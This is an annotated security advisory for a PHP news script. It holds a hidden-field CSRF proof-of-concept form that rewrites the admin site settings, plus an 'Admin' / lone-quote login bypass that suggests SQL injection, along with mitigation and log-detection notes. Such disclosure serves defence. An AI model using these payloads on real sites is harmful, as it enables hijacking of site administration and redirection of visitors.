< ------------------- header data start ------------------- >

#############################################################

# Application Name : NICE NEWS Script

# Vulnerability Type : XSRF (CSRF, cross-site request forgery) ~ Login Bypass

# Infection (impact) : yapilandirma ayarlari degistirilip yönlendirme yapilabilir. (EN: the site's configuration settings can be changed and a redirect introduced.)

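# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmelidir ! (EN: add a per-session token to the admin form and verify it server-side on every POST.) This advice covers only the XSRF issue. The login bypass listed below is a separate flaw: a lone quote character accepted as the password suggests the login query is built by string concatenation, so the login handler probably also needs parameterized queries.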

# Demo : http://www.nicephpscripts.com/scripts/news_script/

# author : CWCaspeR ~ Bug Researchers Grup.

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

[XSRF]
<!--
  Proof-of-concept form as published in the advisory; the markup below is unchanged.

  What it demonstrates: the form's action points at admin/update_site_parameters.php
  and every field except the submit button is hidden. The form carries no
  session-bound token field, so nothing in the request lets the server tell a
  submission made from the real admin page apart from one made by a third-party page
  in an administrator's logged-in browser.
  NOTE(review): that the endpoint accepts such a request is the advisory's claim;
  the server-side code is not shown here.

  The host and path in "action" look like the author's placeholders, not a real
  target, and should not be treated as an indicator of compromise.

  Mitigation: issue an unpredictable per-session token, embed it in the admin form
  and reject any POST to this endpoint whose token is missing or wrong; set the
  SameSite attribute on the session cookie; check the Origin / Referer header on
  state-changing requests.
  Detection: in web server logs, review POSTs to update_site_parameters.php whose
  Origin or Referer is not the site's own admin area.
-->
<form name=form2 method=post action=http://www.hedefsite.com/scriptyolu/admin/update_site_parameters.php onSubmit=return validate(this);>
<input name=nc_item_text type=hidden id=nc_item_text value=News>
<input name=nc_item_plutext type=hidden id=nc_item_plutext value=News>
<!-- adminemail: the value shown appears to be the hosting site's e-mail obfuscation residue, not the address the author used. -->
<input name=adminemail type=hidden class=box1 id=adminemail value=[email protected] size=35 >
<!-- sitename: the value is placeholder text left by the author, not a concrete payload. -->
<input name=sitename type=hidden class=box1 id=sitename value=YONLENDIRME KODU size=35>
<input name=siteaddrs type=hidden class=box1 id=siteaddrs value=http://www.nicephpscripts.com/scripts/news_script size=35>
<input name=ashtml type=hidden id=ashtml value=1checked>
<input name=item_ext type=hidden id=item_ext value=htm>
<!-- The submit button is the only visible control; cat_ext and item_dir are sent with empty values. -->
<input name=Submit type=submit class=btn value=Buton Adi><input name=cat_ext type=hidden id=cat_ext value=><input name=item_dir type=hidden id=item_dir value= >
</form>

[Login Bypass]
Login : Admin
password : ’

< -- bug code end of -- >